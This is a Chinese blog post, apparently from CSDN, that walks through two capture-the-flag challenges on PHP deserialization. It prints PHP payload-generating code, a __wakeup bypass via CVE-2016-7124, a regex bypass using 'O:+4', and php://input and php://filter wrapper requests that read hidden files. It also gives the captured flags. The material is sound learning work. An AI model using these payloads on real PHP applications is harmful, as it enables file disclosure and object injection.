PHP反序列化漏洞——云演

最新推荐文章于 2024-02-11 14:00:00 发布
最新推荐文章于 2024-02-11 14:00:00 发布
阅读量2.1k 收藏 4
点赞数 1
分类专栏: 网络基础 小白入坑 笔记 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46601374/article/details/123601152
版权
小白入坑 同时被 3 个专栏收录
59 篇文章 13 订阅
订阅专栏
笔记
44 篇文章 4 订阅
订阅专栏
网络基础
43 篇文章 4 订阅
订阅专栏

昨天搞了搞掌控的反序列化,突然想到当时打CTF时老师给我们冲了个云演的靶场,

就去看了看,也有反序列化漏洞

顺手搞搞加深一下印象

 第一题

点进去后是这样的

 

 

还记得昨天的

php中有一类特殊的方法叫“Magic function”(魔术方法), 这里我们着重关注一下几个:

__construct():当对象创建(new)时会自动调用。但在unserialize()时是不会自动调用的。(构造函数)

__destruct():当对象被销毁时会自动调用。(析构函数)

__wakeup() :如前所提,unserialize()时会自动调用。

 根据源码可以得出

本题需要绕过一个__wakeup()函数和一个正则匹配,才能显示出 f15g_1s_here.php 文件

绕过__wakeup():在反序列化执行之前,会先执行__wakeup这个魔术方法,所以需要绕过。

绕过__wakeup()是利用CVE-2016-7124漏洞,即反序列化时,如果表示对象属性个数的值大于真实的属性个数时就会跳过__wakeup( )的执行。

我们要传入一个参数flag,并且将传入的值放入反序列化函数中执行,所以我们要传入的应该是一个序列化后的字符串,此时我们应该类Demo进行序列化

我很懒在在线PHP上进行编写

<?php 
class Demo { 
    private $file = 'Gu3ss_m3_h2h2.php';

    public function __construct($file) { 
        $this->file = $file; 
    } 

    function __destruct() { 
        echo @highlight_file($this->file, true); 
    } 

    function __wakeup() { 
        if ($this->file != 'Gu3ss_m3_h2h2.php') { 
            //the secret is in the f15g_1s_here.php 
            $this->file = 'Gu3ss_m3_h2h2.php'; 
        } 
    } 
} 

$flag = new Demo('f15g_1s_here.php');
$flag = serialize($flag);
$flag = str_replace('O:4', 'O:+4',$flag);
$flag = str_replace(':1:', ':2:' ,$flag);
echo base64_encode($flag);
?>

绕过正则:使用+可以绕过preg_match(), 正则匹配这里匹配的是 O:4,我们用 O:+4 即可绕过

 这就是base64编码后的序列化字符串

TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czoxNjoiZjE1Z18xc19oZXJlLnBocCI7fQ==
 

 get传参var可得flag。

flag{05b8825669ae9dee519349e4a9edafca}

第二题

进去以后什么都没有!!!!

 

只能去看源码

 

审计代码,发现本题有以下要求:

1)get方式传递三个参数

2)存在$user

3)读取的$user文件内容===welcome to the bugkuctf

4)$file要求为hint.php

所以在Burp的重放时,要满足前三点

get传参是:/0.1/?txt=php://input&file=php://filter/read=convert.base64-encode/resource=hint.php&password=

 post传参是:welcome to the bugkuctf

 

PD9waHAgIA0KY2xhc3MgRmxhZ3svL2ZsYWcucGhwICANCiAgICBwdWJsaWMgJGZpbGU7ICANCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgDQogICAgICAgIGlmKGlzc2V0KCR0aGlzLT5maWxlKSl7ICAvL+i/memHjCR0aGlzLT5maWxlIOWPr+S7peiuvue9ruS4umZsYWcucGhwDQogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgLy/mmL7npLpmbGFnLnBocOWGheWuuQ0KICAgZWNobyAiPGJyPiI7DQogIHJldHVybiAoImdvb2QiKTsNCiAgICAgICAgfSAgDQogICAgfSAgDQp9ICANCj8+ICA=

这不用说就是base64了

转码吧

 代码如下:

<?php  
class Flag{//flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  //这里$this->file 可以设置为flag.php
            echo file_get_contents($this->file); //显示flag.php内容
   echo "<br>";
  return ("good");
        }  
    }  
}  
?>

在线php

 啥都没解出来,哈哈哈哈

仔细看代码,好想在说flag.php

将hint.php改为flag.php

又被骗了!!!现在不给啥时候给!!!

试试index.php,还真有收获

 

PD9waHAgIA0KJHR4dCA9ICRfR0VUWyJ0eHQiXTsgIA0KJGZpbGUgPSAkX0dFVFsiZmlsZSJdOyAgDQokcGFzc3dvcmQgPSAkX0dFVFsicGFzc3dvcmQiXTsgIA0KaWYoaXNzZXQoJHR4dCkmJihmaWxlX2dldF9jb250ZW50cygkdHh0LCdyJyk9PT0id2VsY29tZSB0byB0aGUgYnVna3VjdGYiKSl7ICANCiAgICBlY2hvICJoZWxsbyBhZG1pbiE8YnI+IjsgIA0KICAgIGlmKHByZWdfbWF0Y2goIi9mbGFnLyIsJGZpbGUpKXsgLy/ov4fmu6RVUkzph4znmoRmbGFn5a2X55y8DQogICAgZWNobyAi5LiN6IO9546w5Zyo5bCx57uZ5L2gZmxhZ+WTpiI7DQogICAgICAgIGV4aXQoKTsgIA0KICAgIH1lbHNleyAgDQogICAgICAgIGluY2x1ZGUoJGZpbGUpOyAgIA0KICAgICAgICAkcGFzc3dvcmQgPSB1bnNlcmlhbGl6ZSgkcGFzc3dvcmQpOyAgDQogICAgICAgIGVjaG8gJHBhc3N3b3JkOyAgLy/lj6/ku6XlnKjlj43luo/liJfljJbnmoTov4fnqIvkuK3ov5Tlm55mbGFnLnBocOeahOWAvO+8jOW5tuWcqOi/memHjOaYvuekug0KICAgIH0gIA0KfWVsc2V7ICANCiAgICBlY2hvICJ5b3UgYXJlIG5vdCB0aGUgbnVtYmVyIG9mIGJ1Z2t1ICEgIjsgIA0KfSAgDQo/PiAgDQo8IS0tICANCiR1c2VyID0gJF9HRVRbInR4dCJdOyAgDQokZmlsZSA9ICRfR0VUWyJmaWxlIl07ICANCiRwYXNzID0gJF9HRVRbInBhc3N3b3JkIl07ICANCmlmKGlzc2V0KCR1c2VyKSYmKGZpbGVfZ2V0X2NvbnRlbnRzKCR1c2VyLCdyJyk9PT0id2VsY29tZSB0byB0aGUgYnVna3VjdGYiKSl7ICANCiAgICBlY2hvICJoZWxsbyBhZG1pbiE8YnI+IjsgIA0KICAgIGluY2x1ZGUoJGZpbGUpOyAvL2hpbnQucGhwICANCn1lbHNleyAgDQogICAgZWNobyAieW91IGFyZSBub3QgYWRtaW4gISAiOyAgDQp9ICANCiAtLT4gIA0K

 再次解码

 

<?php  
$txt = $_GET["txt"];  
$file = $_GET["file"];  
$password = $_GET["password"];  
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    if(preg_match("/flag/",$file)){ //过滤URL里的flag字眼
    echo "不能现在就给你flag哦";
        exit();  
    }else{  
        include($file);   
        $password = unserialize($password);  
        echo $password;  //可以在反序列化的过程中返回flag.php的值,并在这里显示
    }  
}else{  
    echo "you are not the number of bugku ! ";  
}  
?>  
<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
 -->

 真是俄罗斯套娃一个套一个

从源码中我们可以得知如下信息:

1)对关键字flag进行了正则匹配

2)在hint.php中定义了一个FLag类,其中有一个__tostring 方法,这个方法可以理解为将这个类作为字符串执行时会自动执行的一个函数。

3)__tostring 方法执行时,将变量$file作为文件名输出文件内容,结合提示flag.php,猜测屏蔽的flag.php文件在此打开

4)在index.php源码中看到了$password的作用

5)在else代码块中又包含了$file,并且对$password进行反序列化

总结成代码就是

<?php  
class Flag{//flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  //这里$this->file 可以设置为flag.php
            echo file_get_contents($this->file); //显示flag.php内容
   echo "<br>";
  return ("good");
        }  
    }  
}  
$a = new Flag();
$a->file = "flag.php";
echo serialize($a);
?>

 O:4:"Flag":1:{s:4:"file";s:8:"flag.php";} 

最后我们把构造好的payload进行传参即可。

 

先就两关吧!!快11点了我得赶快会宿舍 

正在过坎
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java序列漏洞利用工具.zip
04-10
Java序列漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列序列过程中的安全问题。序列是将对象状态转换为可存储或传输的数据格式的过程,而序列则是将这些数据恢复为原来的对象...
序列(Unserialize)题目讲解
qq_49422880的博客
10-05 5614
[RCTF2015]EasySQL 这道题没有什么思路,就是看网上的WP写出,Sql-lib好像也有这道题。这里要使用的一种注入方法叫做二次注入。具体我就不细讲了。 直接放语句上去: admin"||(updatexml(1,concat(0x7e,(select(database()))),1))# 123"||(updatexml(1,concat(0x7e,(select(database()))),1))# ...
bugku-flag.php(代码审计)
烟敛寒林的博客
12-27 2330
题目地址:http://123.206.87.240:8002/flagphp/ 首先注意他给的一个提示:hint 进入题目后,当我在login框中想半天寻找攻击点的时候,只想到了用御剑去扫描目录然后来查看一些文件,没有想到是GET传参,还好奇点了login咋没应。 根据提示猜测hint可能是参数,于是 payload:http://123.206.87.240:8002/flagp...
flag.php
萍水间人的小天地
01-29 1831
写在前面 好吧我承认我是看了别人的wp,目前还很菜 然而我看了wp也不会做。 初探 页面 进去之后是一个什么都点不动的页面。。 然后有提示 hint 联系到可能是SQL注入 于是在URL后面加一个hint参数 http://123.206.87.240:8002/flagphp/?hint=1 得到一串代码: <?php error_reporting(0)...
ctf题php序列,从一道CTF题中学习php序列与伪协议
weixin_39927214的博客
04-01 1784
之前一直有想写关于序列的东西,可是一直拖拖拖,拖到了现在。本文尝试从ZJCTF2019中的例题来了解何为php序列,以及php伪协议。原题:逆转思维1234567891011121314151617181920$text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&am...
flag.php--cookie伪造分号必须url编码、unserialize()函数、serialize()
qq_32642035的博客
03-18 348
拿到题目 发现很干净,点击提交不发生流量,源码和header都没有发现线索 回到题目看到提示,提示:hint 题目为flag.php 线索可能有两个,hint参数和flag.php页面 尝试在各个页面通过get和post方式hint参数 发现主页提交参数得到源码 访问flag.php无显示内容 serialize()序列函数 serialize() 返回字符串,此字符串包含了表示 valu...
Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271
11-11
Java序列漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查...
php序列靶场,集合了常见的php序列漏洞——由这周末在做梦制作.zip
01-14
通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防练的理想...
PHP序列漏洞详解.rar
02-07
在IT安全领域,PHP序列漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
php特性靶场
LS_Sy的博客
02-03 1068
所以加字母传入不能使用了,但php有个特殊的字母:e,可以表示科学计数法,但是当intval()读取到e的时候就会停止,所以可以在末尾加e进行传参最终得到flag。}来检查 $num 是否包含任何字母,如果存在字母则终止程序并输出 no no no!这道题也与上一题大体上类似,区别在于新加了if(preg_match(“/[a-z]/i”, $num)){die(“no no no!
php-SER-libs-main序列靶场通关详细思路
qq_73767109的博客
05-30 3989
这里先是要把my类实例到body中,而project要是my中不存在的方法,理应随便赋值但是在触发__call后call需要输入两个参数,name可以自行赋值,但是func就要在触发时就有参数,所以在给project赋值的时候应该赋参数这样在。主要利用的是session.upload_progress.enabled 当该设置为on 的时候,在向服务器上传任意一个文件的时候php会把该上传文件的详细信息(如上传时间,文件名等)储存在session中,而当我们以。新手学习序列
iwebsec靶场(PHP序列
果粒程
03-08 788
iwebsec靶场(PHP序列
CTFHub技能树 Web-SSRF 伪协议读取文件
Senimo
07-01 800
CTFHub技能树 Web-SSRF 伪协议读取文件 hint:尝试去读取一下Web目录下的flag.php吧 启动环境,页面空白,查看 URL: http://challenge-d8a780b03b135e05.sandbox.ctfhub.com:10800/?url=_ 题目说明使用伪协议读取 flag,也给出了提示为 Web 目录,尝试构造 Payload,使用file协议读取文件: file:///var/www/html/flag.php 带入到 GET 传参中,查看网页源码,得到 fla
LKWA靶场通关和源码分析
Aiwin的博客
02-10 1027
简单好玩的lkwa靶场通关和源码分析
Pikachu靶场——PHP序列漏洞
来日可期的博客
09-30 1806
序列是将对象转换为字节流或其他可传输格式的过程,以便将其存储在文件中、通过网络发送或在内存中保存。序列是将序列的数据重新还原为对象的过程。序列漏洞通常出现在不正确或不安全的序列实现中。攻击者可以构造恶意的序列数据,利用漏洞触发远程代码执行、拒绝服务攻击、信息泄露等安全问题。
使用PHPstudy搭建DVWA靶场
北冥同学的成长记录笔记
04-29 5411
DVWA(Damn Vulnerable Web Application)一个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用平台,旨在为网络安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
序列漏洞靶场
最新发布
leah126的博客
02-11 1684
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。此外,还将收集网上一些其他常用框架的序列链,对收录的所有序列链进行漏洞分析复现,并给出自己的 poc,以供参考。Laravel_5.4.0_9.3.6+_序列链_RCE1。
pikachu-php序列源码分析及修复
静水流深,沧笙踏歌
09-08 1388
在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。             序列serialize()            ...
php序列漏洞习题
09-06
关于PHP序列漏洞的习题,可以使用GlobIterator类和ArrayObject类来进行练习。其中,GlobIterator类的题目是被遗忘的序列,ArrayObject类的题目是easy_phpPHP序列漏洞是一种安全漏洞,其中一个具体的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值